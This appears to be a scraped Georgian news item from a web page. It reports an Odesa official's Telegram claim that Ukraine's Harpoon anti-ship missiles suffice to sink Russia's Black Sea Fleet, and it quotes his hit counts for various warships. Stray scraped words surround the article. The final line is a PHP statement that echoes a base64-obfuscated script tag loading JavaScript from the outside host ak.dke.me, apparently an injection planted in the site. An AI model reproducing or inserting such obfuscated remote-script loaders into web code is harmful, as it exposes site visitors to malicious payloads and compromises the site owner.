celsiusi
ავერსი საქკაბელი
უკრაინამ მიიღო საკმარისი რაოდენობის გემსაწინააღმდეგო რაკეტა Harpoon-ი იმისთვის, რომ თავდაცვითი მოქმედებებისას ჩაძიროს რუსეთის მთელი შავი ზღვის ფლოტი,- ამის შესახებ ოდესის სამხედრო ადმინისტრაციის თავმჯდომარემ სერგეი ბრატჩუკმა „ტელეგრამის“ გვერდზე განაცხადა.
 
მან ასევე გამოაქვეყნა ვიდეო, რომელიც ასახავს გემსაწინააღმდეგო რაკეტის გამოყენებას. ბრატჩუკის განმარტებით, Harpoon-ს რაკეტის ეფექტურობის დემონსტრირება მოხდა როგორც საცდელი გაშვებისას, ისე საომარ პირობებში.
 
ამერიკელ სპეციალისტებზე დაყრდნობით, ბრატჩუკმა ასევე აღნიშნა, რომ ავიამზიდის წყობიდან გამოსაყვანად, მას Harpoon-ის 5 რაკეტა უნდა მოხვდეს, კრეისერის გასანადგურებლად საკმარისია 4 რაკეტა.
 
„ერთ რაკეტას შეუძლია სერიოზული ზიანი მიაყენოს პატარა გემს ან კატერს“,- განაცხადა ბრატჩუკმა.
620
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");